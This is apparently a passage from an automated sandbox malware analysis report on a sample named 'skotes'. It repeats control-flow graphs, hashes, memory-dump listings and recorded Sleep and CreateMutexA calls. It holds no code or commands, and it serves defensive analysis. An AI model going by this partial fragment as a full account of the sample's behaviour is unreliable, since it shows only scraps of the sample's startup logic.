                                                                                                                                                                                                                                                                • Instruction ID: 0d792a571b4335115f1fdea7e0c376233e38e20b4d4cef50414e3e59cd9ac86b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daaeaa316780847bbb546f57e85c6a8b2bc3d0f72fa22a92d1f47cbe42324067
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12E0CD30045118AFCF357F1CDA09E483B69FF61745F000802FA154A321CB36EDC2D640

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: ecb0ac49a153d485ad4c88cda5e2e2554b0632772faa2aca33f4cf8fcdab4adc
                                                                                                                                                                                                                                                                • Instruction ID: f56bc1617af2f9ea964af5a47eab8c99416296d848d7bc16d5c6bfa68643d024
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecb0ac49a153d485ad4c88cda5e2e2554b0632772faa2aca33f4cf8fcdab4adc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 833128317142049BEB08AB7CDDC97AFB7AAEBD7310F248218E014973D6C7769980C751

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 22 aa9f44-aa9f64 26 aa9f92-aa9fae 22->26 27 aa9f66-aa9f72 22->27 30 aa9fdc-aa9ffb 26->30 31 aa9fb0-aa9fbc 26->31 28 aa9f88-aa9f8f call abd663 27->28 29 aa9f74-aa9f82 27->29 28->26 29->28 32 aaa92b 29->32 36 aaa029-aaa916 call ab80c0 30->36 37 aa9ffd-aaa009 30->37 34 aa9fbe-aa9fcc 31->34 35 aa9fd2-aa9fd9 call abd663 31->35 39 aaa953-aaa994 Sleep CreateMutexA 32->39 40 aaa92b call ad6c6a 32->40 34->32 34->35 35->30 43 aaa00b-aaa019 37->43 44 aaa01f-aaa026 call abd663 37->44 51 aaa996-aaa998 39->51 52 aaa9a7-aaa9a8 39->52 40->39 43->32 43->44 44->36 51->52 54 aaa99a-aaa9a5 51->54 54->52
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 68bf06ba4e03dc0a82d1275646713fcd845aec75b23c15aa48d108417be8e081
                                                                                                                                                                                                                                                                • Instruction ID: 365ff83fae184b647156b4293e048232a621cacb665db3101c8d631a79338a87
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68bf06ba4e03dc0a82d1275646713fcd845aec75b23c15aa48d108417be8e081
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F13146317102049BEB18AB78DD887AEB7AAEBD6310F208619E014DB2D6D7369980C752

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 56 aaa079-aaa099 60 aaa09b-aaa0a7 56->60 61 aaa0c7-aaa0e3 56->61 64 aaa0a9-aaa0b7 60->64 65 aaa0bd-aaa0c4 call abd663 60->65 62 aaa111-aaa130 61->62 63 aaa0e5-aaa0f1 61->63 69 aaa15e-aaa916 call ab80c0 62->69 70 aaa132-aaa13e 62->70 67 aaa0f3-aaa101 63->67 68 aaa107-aaa10e call abd663 63->68 64->65 71 aaa930 64->71 65->61 67->68 67->71 68->62 76 aaa140-aaa14e 70->76 77 aaa154-aaa15b call abd663 70->77 73 aaa953-aaa994 Sleep CreateMutexA 71->73 74 aaa930 call ad6c6a 71->74 85 aaa996-aaa998 73->85 86 aaa9a7-aaa9a8 73->86 74->73 76->71 76->77 77->69 85->86 88 aaa99a-aaa9a5 85->88 88->86
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: e2be42c1f5dc7a20aa00d93eca6cc82d663627336faf75e7026fe43d24c11e0f
                                                                                                                                                                                                                                                                • Instruction ID: 7d19f81d3701a91aff00f325df5805e9babf251311a5aa0ef6dd2d4110827b58
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2be42c1f5dc7a20aa00d93eca6cc82d663627336faf75e7026fe43d24c11e0f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D03146317502009BEB089B78CDC9BAEB7BADBE6314F208319E014973D6C7369980C762

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 90 aaa1ae-aaa1ce 94 aaa1fc-aaa218 90->94 95 aaa1d0-aaa1dc 90->95 98 aaa21a-aaa226 94->98 99 aaa246-aaa265 94->99 96 aaa1de-aaa1ec 95->96 97 aaa1f2-aaa1f9 call abd663 95->97 96->97 100 aaa935 96->100 97->94 102 aaa228-aaa236 98->102 103 aaa23c-aaa243 call abd663 98->103 104 aaa293-aaa916 call ab80c0 99->104 105 aaa267-aaa273 99->105 107 aaa953-aaa994 Sleep CreateMutexA 100->107 108 aaa935 call ad6c6a 100->108 102->100 102->103 103->99 111 aaa289-aaa290 call abd663 105->111 112 aaa275-aaa283 105->112 119 aaa996-aaa998 107->119 120 aaa9a7-aaa9a8 107->120 108->107 111->104 112->100 112->111 119->120 122 aaa99a-aaa9a5 119->122 122->120
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
